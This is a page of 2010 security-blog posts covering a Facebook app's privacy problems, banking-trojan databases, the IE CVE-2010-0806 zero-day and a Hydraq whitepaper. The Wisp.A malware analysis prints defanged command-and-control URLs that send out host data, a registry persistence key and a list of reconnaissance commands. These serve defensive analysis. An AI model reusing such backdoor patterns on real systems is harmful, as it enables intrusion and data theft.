Published: March 15 2010, 06:47 PM | 3 Comment(s)
by Benjamin Googins

The Facebook application "who is checking my profile" is a privacy invasion, uses deceitful language and should be removed from Facebook. 

Deceitful language
I logged into Facebook to see in my Newsfeed a friend posted the results of the application (shortened to app for this blog) "who is checking my profile?" (http://apps.facebook.com/check-profile-g/).  Previously I had noticed another friend posted the results of the app "who is your top follower?"  (http://apps.facebook.com/jywcocmkds).  It is odd that two apps would be constructed with the same look, feel and functionality, but fall under different names.  Both apps appear to be the same basic program. Both are one collage image constructed of multiple "profile" images of friends - apparently in the order of “viewing” rank.  Both apps have the comment "try it, really works [sic]" with the direct link to the app posted by the same friend that posted the original app results.  The comment then triggers an email sent to each user titled, “<insert friend’s name> commented on a photo of you on Facebook...”  Both comments finish with exactly two exclamation marks.  Both comments leave off the grammatically necessary "it" before "really".  Both “tag” all the profile images in the collage, triggering an email sent to everyone titled, “<insert friend’s name> tagged a photo of you”.  It seems safe to say these comments were auto-generated by the app's creator. 

Here is a screenshot of what I saw.  I had to redact it in many spots to maintain my friend’s privacy:

The titles "who is checking my profile" and "who is your top follower" imply someone is actively navigating to the person's profile.  In both cases above, I can't recall ever specifically navigating to either person's profile, with the exception of when we first became "friends" and to verify the person's identity before sharing my personal information.  If the app is actually drawing on real data, I can only conclude it is using the number of "comments" and "likes" and other similar data -- not actual direct profile views – none of which actually require navigating to the user’s profile as the titles imply.  Other friends have confirmed the same scenario -- they can’t recall visiting someone's profile, but are listed in the "top follower" results.  At the very least, the two app titles are misnomers.

Privacy violation
Even if the results of the apps "who is checking my profile" and "who is your top follower" were accurate to what their names imply, both are invasive and violate user privacy.  How many times a person views another's profile is a form of metadata – data that is an interpretation of other data.  This is not data that users explicitly agree to share with others when they join Facebook.  Permission should be obtained from each individual whose metadata will be shared, prior to the app gaining access to the required data to function.  If and when Facebook granted the developer access to this metadata, they removed individual control of the data.  The developer turned around and shared the metadata with friends, without their control.  Individuals desire control of their data – meaning they want to control who in their life gets to know what information.  For example, a doctor gets to know things a professor does not.  The same holds true for Facebook friends and relationships.  This flow of metadata from Facebook, to app developer, back to other friends will impede users from freely navigating amongst their circle of “friends” if they think each click will be recorded and shared back to those same friends. 

Resolution
Facebook should shut down both applications.  Further, in the future, users should be able to control what sensitive metadata application developers have access to.  Not all metadata is necessarily personal enough to be sensitive to an individual.  Alternatively, application developers should be required to obtain permission from each person whose metadata is being shared.  In the case above, the person using the application had to grant access to the application, but the application did not obtain permission from all the friends impacted.  This needs to change.

Share this post:  Email

Share

Published: March 14 2010, 11:44 PM | no comments
by Zarestel Ferrer

It is a giveaway when banking trojans do not hide the connection string they use to access their database online. The database is the central repository of all the information stolen from compromised systems. The connection string contains the user credentials needed to access the database and is in the following format

Provider=<oledb provider>; Data Source=<data source>; Network Library=<network library>;
Initial Catalog=<database>; User ID=<userid>; Password=<password>;

In Figure 1, the memory dump screenshot displays readable banking trojan connection string.

                                                       [Figure 1 – Memory dump contained readable connection string]

As expected, User ID and password are the top priority information captured by info stealer trojans; however it is also interesting to know the institutions it is targeting. We have taken a screenshot as shown in Figure 2, displaying the tables and fields inside one of the databases we found. It highlights attackers’ interest of gaining access to users’ financial, email and social networking credentials.

                                                  [Figure 2 – Tables and fields inside the info stealer’s database]

Safe Computing Practice

After studying the database, we found that it stores users’ system log-in information. For instance a Brazillian banking Trojan database listed the username “Administrador” (which is means Administrator in english), as the top log-in user name stolen. 

                                              [Figure 3 – Tables inside the Brazilian Banking Trojan’s database]

The information (shown in Figure 03) should remind everyone not to use administrator account when performing regular computing activities such as surfing the internet. In an event of infection, an attacker through the malware can gain access and complete control of the system and network. Standard user account can help secure the system by limiting unauthorized access to the systems administrative operation such as software installation; user accounts management and network settings.

In addition, strong password should be in place to avoid attackers from successfully guessing the password and eventually gaining control of user’s account.

Notable Info Stealer Trojans

Below are some of CA’s malware detection names for known prevalent information stealers families:

• Win32/Bancos – Bank account credential stealer
• Win32/Banker – Bank account credential stealer
• Win32/Bancorkut - Banking trojan and Orkut user name password stealer
• Win32/Infonap – Credit card and email credential information stealer
• Win32/Gamepass – steals login credentials and in-game information related to various Massively Multiplayer Online Role Playing Games (MMORPG).

CA advises everyone to keep your security softwares updated and always practice safe computing.

Other References

User Account Control in Windows 7 Best Practices

Share this post:  Email

Share

Published: March 12 2010, 11:16 AM | no comments
by Zarestel Ferrer

Microsoft Security Advisory (981374) refers to vulnerability in Internet Explorer that could allow remote code execution. An invalid pointer reference used within Internet Explorer caused the vulnerability.

This vulnerability was discovered in the wild and works on Internet Explorer versions 6 and 7.

                                             [Figure 1 - Illustration of a drive-by download website]

The exploit code contains instruction to download and install a backdoor program from topix21century<dot>com. The backdoor is detected by CA as Win32/Wisp.A.

Malware Installation

Upon execution of the backdoor it will create a copy of itself as clipsvc.exe and note.exe, and a DLL file, wshipl.dll in the %Temp% directory of the infected system.

It also adds the registry key

• HKCU \Software\Microsoft\Windows\CurrentVersion\Run\note="%Temp%\note.exe -installkys"

Backdoor Commands and Behavior

Win32/Wisp.A gets the infected system's computer name and resolves local IP address.
It connects to a  website notes<dot>topix21century<dot>com using HTTPS (port 443).

It sends information about the computer name and IP address in the following format

• https://notes<dot>topix21century<dot>com/asp/kys_allow_get<dot>asp?name=getkys<dot>kys&hostname=<PC_NAME>-<IP_ADDRESS>-note

Win32/Wisp.A retrieves an encrypted configuration file from the server and saves it to %Temp%\gnotes.dat. It decrypts the file and saves the information to %Temp%\tgnotes.dat.

The decrypted information is shown below.

getfile:
putfile:
door:
     findpass2000
cmd:
     ipconfig /all
     netstat -ano
     net start
     net group "domain admins" /domain
     tasklist /v
     dir c:\*.url /s
     dir c:\*.pdf /s
     dir c:\*.doc /s
     net localgroup administrators
     type c:\boot.ini
     systeminfo
time:
     300000

The main backdoor commands are delimited by the colon character and they are 

• [getfile]
• [putfile]
• [door]
• [cmd]
• [time]

Description of each command

   1. [getfile] - Download a file from the remote server. 

The parameter expected for this command is a filename, it is later concatenated to the URL below   

• https://notes<dot>topix21century<dot>com/asp/kys_allow_get.asp?name=

   2. [putfile] - Send a file to the remote server using the following URL string

• https://notes<dot>topix21century<dot>com/asp/kys_allow_put.asp?type=

   3. [door] - Execute any of the foolowing backdoor commands:

• shell - execute commands listed under [cmd].
• run - execute using WinExec API.
• process - retrieve the list of processes and its modules running in the system and save it to the file %Temp%\pnotes.dat.
• reboot - Reboot system.
• kill - Terminate Process
• termport - Retrieves the value of the registry key below and saves it to the file %Temp%\pnotes.dat
      - HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber 

The information written in file %Temp%\pnotes.dat is sent to the remote server.

   4. [cmd] - Execute the given commands in the comand shell.

   5. [time] - The value is used for the generation of random number.

CA detects the malicious javascript downloading this backdoor as JS/CVE-2010-0806!exploit.
Internet Explorer 8 is not affected by the vulnerability mentioned in Microsoft Security Advisory (981374). We advise users to get the latest version of the internet browser and ensure your security software use the latest signature database.

Related entry

IE Zero-Day CVE-2010-0806

Share this post:  Email

Share

Published: March 12 2010, 07:34 AM | 2 Comment(s)
by Methusela Cebrian Ferrer

CA ISBU’s Internet Security Intelligence published a whitepaper titled 'In-depth Analysis of Win32/Hydraq – The face of cyberwar enemies unfolds' containing 37 pages of technical description describing detailed analysis of Hydraq offensive capabilities and features.

The analysis highlights the intricate details of the backdoor covert communication. Hydraq’s client-server uses port 443 as an overt communication channel and embeds a custom header to avoid discovery of on-going attacks over the network.

Backdoor commands of the malware were also discussed and simulated, covering potential steps undertaken by the attackers to achieve its goal. From the malicious JavaScript hosted on drive-by-download and compromised websites up to the main backdoor component, these attack tools were disassembled and presented to gain deeper understanding of the types of threats perpetrated in cyberspace.

Unraveling the hidden codes and flags behind the communication can assist network security administrators and forensic analysts assess the risk and understand the extent of each attacks deployed. By exposing the details of Hydraq, we hope that it contributes to overall cyber security learning and awareness.

Abstract

There are thousands of undetected online threats and malware attacks from around the worldevery day. Most of these attacks take place in cyberspace, where unsuspecting people fall prey to various forms of cybercrime. Common cyber criminal activity involves stealing sensitive information such as credit card details, online login credentials, browsing history and email addresses. However, notable skilled attacks occur when the target is in possession of highly-valuable information that could be leveraged as a weapon for warfare.

Hydraq is a family of threats used in highly sophisticated, coordinated attacks against large and high-profile corporate networks. It is referred to as Operation Aurora, Google Hack Attack and Microsoft Internet Explorer 0-day (CVE-2010-0249). An in-depth code investigation and analysis will highlight Hydraq features and capabilities, and as it unfolds, questions will unravel on to whether the discovery of this threat is just the beginning of a global arms race against cyberwarfare.

Download the full technical whitepaper here.

Reference readings:

Is it safe to Explore? http://community.ca.com/blogs/securityadvisor/archive/2010/01/20/is-it-safe-to-explore.aspx
 
JS/Hydraq.A http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=80910

Win32/Hydraq.B http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=80946

Win32/Hydraq Family http://www.ca.com/se/en/securityadvisor/virusinfo/virus.aspx?id=80909 

Share this post:  Email

Share

Published: March 11 2010, 01:29 AM | 1 Comment(s)
by Ricardo Robielos III

Microsoft recently released a security advisory regarding Microsoft Internet Explorer 'iepeers.dll' Remote Code Execution Vulnerability (981374) affecting Internet Explorer versions 6 and 7. The vulnerability exists as an invalid pointer reference within Internet Explorer.

The said vulnerability does not work on Internet Explorer 8, users who are still using old version of Internet Explorer particularly version 6 and 7 is encouraged to update their internet browser to the latest version.

Below is a sample of a malicious JavaScript file currently in the wild that exploits this Vulnerability (Figure 1).

                     
                                          [Figure 1: JavaScript containing exeploit code]

We detect this malicious JavaScript Trojan as JS/CVE-2010-0806!exploit. This JS malware downloads and executes a file called “svohost.exe” which is a malicious Backdoor Trojan. We detect this backdoor as Win32/Wisp.A

CA advises users to always keep your security products up-to-date.

 Other References for this Vulnerability:

• http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806
• http://www.securityfocus.com/bid/38615
• http://osvdb.org/show/osvdb/62810

Share this post:  Email

Share